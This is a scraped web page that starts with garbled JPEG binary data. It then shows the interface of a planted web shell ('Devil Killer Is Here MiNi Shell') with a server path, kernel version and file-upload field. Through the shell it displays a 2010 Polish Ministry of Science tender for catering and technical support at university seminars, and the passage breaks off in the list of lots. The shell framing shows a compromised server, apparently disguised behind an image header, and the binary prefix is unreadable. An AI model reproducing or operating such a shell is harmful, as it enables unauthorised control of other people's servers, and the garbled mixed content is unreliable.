JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100827/267598-N-2010.html

<p class="kh_header"><b>Warszawa: Usługi cateringowe oraz wsparcie techniczne podczas spotkań i konferencji w ramach projektów systemowych</b><br>
<b>Numer ogłoszenia: 267598 - 2010; data zamieszczenia: 27.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnisw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi cateringowe oraz wsparcie techniczne podczas spotkań i konferencji w ramach projektów systemowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
Konferencja sprawozdawczo-informacyjno-promocyjna Zamawianie Kształcenia -Warszawa 24.11.2010 - przewidywana liczba osób 60 - catering 
Część II
Seminarium KRK -Warszawa Akademia Pedagogiki Specjalnej 29.09.2010 - przewidywana liczba osób	80 - catering oraz wsparcie techniczne
Seminarium KRK - Warszawa Politechnika Warszawska 27.09.2010 - przewidywana liczba osób 80 - catering oraz wsparcie techniczne
Seminarium KRK-Warszawa	UW Październik 2010 - przewidywana liczba osób 80 catering oraz wsparcie techniczne
Seminarium KRK-Warszawa SGGW Październik 2010-przewidywana liczba osób 80 
catering oraz wsparcie techniczne
Seminarium KRK - Warszawa Akademia Medyczna Listopad 2010 - przewidywana liczba osób 80 - catering oraz wsparcie techniczne
Seminarium KRK - Warszawa Uniwersytet Muzyczny 30.09.2010 - przewidywana liczba osób 80 - catering oraz wsparcie techniczne
Seminarium KRK - Warszawa Koźmiński lub SGH Październik 2010 - przewidywana liczba osób 80 - catering - wsparcie techniczne

Część III
Konferencja sprawozdawczo-informacyjno-promocyjna Zamawianie Kształcenia -Kraków 06.12.2010-przewidywana liczba osób 50 -catering 
Spotkanie akademickie Kampania promocyjna - Kraków UJ	28.09.2010 - przewidywana liczba osób 200 - catering
Spotkanie akademickie Kampania promocyjna - Kraków Uniwersytet Pedagogiczny 29.10.2010 - przewidywana liczba osób 200 - catering

Część IV
Seminarium KRK - Kraków UJ Listopad 2010 - przewidywana liczba osób 80 catering oraz wsparcie techniczne
Seminarium KRK-Kraków AGH	Grudzień 2010-przewidywana liczba osób 80 - catering oraz wsparcie techniczne
Część V
Spotkanie akademickie Kampania promocyjna - Rzeszów 	Politechnika Rzeszowska 10.09.2010-przewidywana liczba osób 200-catering

Część VI
Spotkanie akademickie Kampania promocyjna - Wrocław Uniwersytet Wrocławski 04.11.2010-przewidywana liczba osób 200 - catering

Część VII
Spotkanie akademickie Kampania promocyjna -Olsztyn UMW 17.09.2010- przewidywana liczba osób 200 - catering

Część VIII
Spotkanie akademickie Kampania promocyjna - Kalisz PWSZ 21.09.2010- przewidywana liczba osób 200-catering

Część IX
Spotkanie akademickie Kampania promocyjna - Szczecin Uniwersytet Szczeciński 23.09.2010 przewidywana liczba osób 200 - catering

Część X
Spotkanie akademickie Kampania promocyjna - Łodź Politechnika Łódzka 24.09.2010 przewidywana liczba osób 200 - catering

Część XI
Spotkanie akademickie Kampania promocyjna - Poznań Uniwersytet Adama Mickiewicza 29.09.2010 - przewidywana liczba osób 200 - catering

Część XII
Spotkanie akademickie Kampania promocyjna - Toruń UMK 19.11.2010 - przewidywana liczba osób 200 - catering

Część XIII
Spotkanie akademickie Kampania promocyjna - Suwałki PWSZ 06.10.2010 - przewidywana liczba osób 200 - catering

Część XIV
Spotkanie akademickie Kampania promocyjna Piła PWSZ 07.10.2010 - przewidywana liczba osób 200 - catering

Część XV
Spotkanie akademickie Kampania promocyjna - Katowice Uniwersytet Śląski 12.10.2010 - przewidywana liczba osób 200 - catering

Część XVI
Spotkanie akademickie Kampania promocyjna - Lublin Politechnika Lubelska 14.10.2010 - przewidywana liczba osób 200 - catering

Część XVII
Spotkanie akademickie	Kampania promocyjna	Wrocław 	Politechnika Wrocławska	22.10.2010 przewidywana liczba osób 	200	catering

Część XVIII
Spotkanie akademickie	Kampania promocyjna	Wałbrzych	PWSZ	26.10.2010	przewidywana liczba osób 200	catering

Część XIX
Spotkanie akademickie	Kampania promocyjna	Opole 	Politechnika Opolska	27.10.2010	przewidywana liczba osób 200	catering

Część XX
Spotkanie akademickie	Kampania promocyjna	Kielce 	Politechnika Świętokrzyska	26.10.2010 przewidywana liczba osób 200	catering

Część XXI
Spotkanie akademickie	Kampania promocyjna	Zielona Góra Uniwersytet Zielonogórski	18.10.2010 przewidywana liczba osób 	200	catering

Część XXII
Spotkanie akademickie	Kampania promocyjna	Lublin 	UMCS	25.10.2010 przewidywana liczba osób 	200	catering

Część XXIII
Seminarium	KRK	Gdańsk	Uniwersytet Gdański Październik .2010	przewidywana liczba osób 80	catering - wsparcie techniczne
Seminarium	KRK	Gdańsk	Politechnika Gdańska	 Październik .2010	przewidywana liczba osób 80 catering - wsparcie techniczne

Część XXIV
Seminarium	KRK	Łódź	Politechnika Łódzka	 Grudzień 2010 przewidywana liczba osób 	80	catering - wsparcie techniczne
Seminarium	KRK	Łódź	AH-E, UŁ	 Grudzień 2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXV
Seminarium	KRK	Elbląg	PWSZ	Październik .2010	80	catering - wsparcie techniczne

Część XXVI
Seminarium	KRK	Olsztyn	Uniwersytet Warmińsko-Mazurski	Październik .2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXVII
Seminarium	KRK	Słupsk	Akademia Pomorska 	 Październik .2010	80	catering - wsparcie techniczne

Część XXVIII
Seminarium	KRK	Koszalin	Politchnika Koszalińska	 Październik .2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXIX
Seminarium	KRK	Szczecin	Zachodniopomorski Uniwersytet Technologiczny w Szczecinie	 Październik .2010 przewidywana liczba osób 	80	catering - wsparcie techniczne
Seminarium	KRK	Szczecin	Uniwersytet Szczeciński	 Październik .2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXX
Seminarium	KRK	Poznań	Politechnika lub Uniwersytet Przyrodniczy	 Październik .2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXXI
Seminarium	KRK	Zielona Góra	Uniwersytet Zielonogórski 	 Październik .2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXII
Seminarium	KRK	Gorzów	PWSZ	 Październik .2010	 przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXIII
Seminarium	KRK	Katowice	Uniwersytet Śląski	Październik .2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXXIV
Seminarium	KRK	Bieslko-Biała	Akademia Techniczno-Humanistyczna	Październik .2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXV
Seminarium	KRK	Opole	Uniwersytet Opolski	Październik .2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXXVI
Seminarium	KRK	Wrocław	Uniwersytet Wrocławski	Październik .2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXVII
Seminarium	KRK	Bydgoszcz	UKW	Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXVIII
Seminarium	KRK	Toruń	UMK	Listopad 2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXXIX
Seminarium	KRK	Włocławek lub Płock	WS Ekon-Hum.	Listopad 2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXXX
Seminarium	KRK	Siedlce	Akademia Podlaska	 Listopad 2010 przewidywana liczba osób 	80	catering - wsparcie techniczne

Część XXXXI
Seminarium	KRK	Białystok	Politechnika Białostocka	 Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXII
Seminarium	KRK	Łomża	PWSZ	 Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXIII
Seminarium	KRK	Lublin	Politechnika Lubelska	 Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXIV
Seminarium	KRK	Rzeszów	URZ	 Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXV
Seminarium	KRK	Zamość	PWSZ	 Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXVI
Seminarium	KRK	Sanok	PWSZ	 Listopad 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXVII
Seminarium	KRK	Częstochowa	Politechnika Częstochowska	 Grudzień 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXVIII
Seminarium	KRK	Kielce	Politechnika Świętokrzyska	 Grudzień 2010	przewidywana liczba osób 80	catering - wsparcie techniczne

Część XXXXIX
Seminarium	KRK	Radom	Wyższ Szkoła Handlowa lub PWZS	 Grudzień 2010	przewidywana liczba osób 80	catering - wsparcie techniczne


1. Zamawiający informuje iż ww. terminy spotkań mogą ulec zmianie szczegółowe daty spotkań zostaną ustalone z Wybranym wykonawcą nie poźniej niż na 2 dni (robocze) przed spotkaniem
2.Szczegółowy opis przedmiotu zamówienia dla 49 części przedstawiono 
w Załączniku Nr 1 do SIWZ.
a)usługi bufetowe oraz w zakresie podawania posiłków - wartość usługi wynosi 60% całości zamówienia;
b)usługi wsparcia technicznego - wartość usług wynosi 40 % całości zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 49.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Przewiduje się możliwość zmiany postanowień zawartej umowy w zakresie:
1)	miejsca realizacji spotkania, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Zamawiającego;
2)	terminu realizacji spotkania, w uzasadnionych przypadkach przyczyn niezależnych od Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nauka.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3, 00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr  36 ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 12:00, miejsce: Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3, 00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr  38).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane w ramach Programu Operacyjnego Kapitał Ludzki projektów Zamawianie kształcenia na kierunkach technicznych, matematycznych i przyrodniczych - pilotaż, Kampania promocyjna na rzecz kierunków matematycznych, przyrodniczych, technicznych, Krajowe Ramy Kwalifikacji w szkolnictwie wyższym jako narzędzie poprawy jakości kształcenia, poddziałanie 4.1.2. i 4.1.3 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 1 części zamówienia obejmuje usługę cateringową podczas spotkania sprawozdawczo - informacyjnego w Ministerstwie Nauki i Szkolnictwa Wyższego w Warszawie- przewidywany termin realizacji spotkania - 24 listopada 2010 r. 
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla maksymalnie 60 osób, podczas spotkania sprawozdawczo - informacyjnego w Krakowie.
Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 2 części zamówienia obejmuje usługę wsparcia technicznego i cateringową podczas spotkania informacyjno - promocyjno - konsultacyjnego na  :
1.	Politechnice Warszawskiej - przewidywany termin realizacji -  27 września 2010 r.
2.	Akademia Pedagogiki Specjalnej w Warszawie - przewidywany termin realizacji - 29.09.2010
3.	Uniwersytet Warszawski -  przewidywany termin realizacji - październik 2010
4.	Szkoła Główna Gospodarstwa Wiejskiego - przewidywany termin realizacji - październik 2010 
5.	Akademia Medyczna - przewidywany termin realizacji -  listopad 2010 
6.	Uniwersytet Muzyczny - przewidywany termin realizacji - 30.09.2010 
7.	Szkoła Główna Handlowa lub Koźmiński - przewidywany termin realizacji -  październik 2010
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 3 części zamówienia obejmuje usługę cateringową podczas:
1.	spotkania sprawozdawczo - informacyjnego w jednej z Krakowskich uczelni - przewidywany termin realizacji spotkania - 6 grudnia 2010 r. Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla maksymalnie 50 osób, podczas spotkania sprawozdawczo - informacyjnego w Krakowie
2.	Trzech spotkań akademickich na:
2.2.	Uniwersytecie Jagiellońskim- przewidywany termin realizacji spotkania -  28.09.2010
2.3.	Uniwersytecie Pedagogicznym w Krakowie- przewidywany termin realizacji spotkania -  29.10.2010

Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 4 części zamówienia obejmuje  cateringową i usługę wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na :
1.	Uniwersytecie Jagiellońskim - przewidywany termin realizacji spotkania -listopad 2010 
2.	Akademii Górniczo Hutniczej - przewidywany termin realizacji spotkania -  grudzień 2010 
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.55.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 4 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Politechnice Rzeszowskiej - przewidywany termin realizacji spotkania - 10 września 2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 6 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Wrocławskim- przewidywany termin realizacji spotkania -  04.11.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 7 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Warmińsko-Mazurskim w Olsztynie - przewidywany termin realizacji spotkania - 17.09.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 8 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego w Państwowej Wyższej Szkole Zawodowej w Kaliszu - przewidywany termin realizacji spotkania - 21.09.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
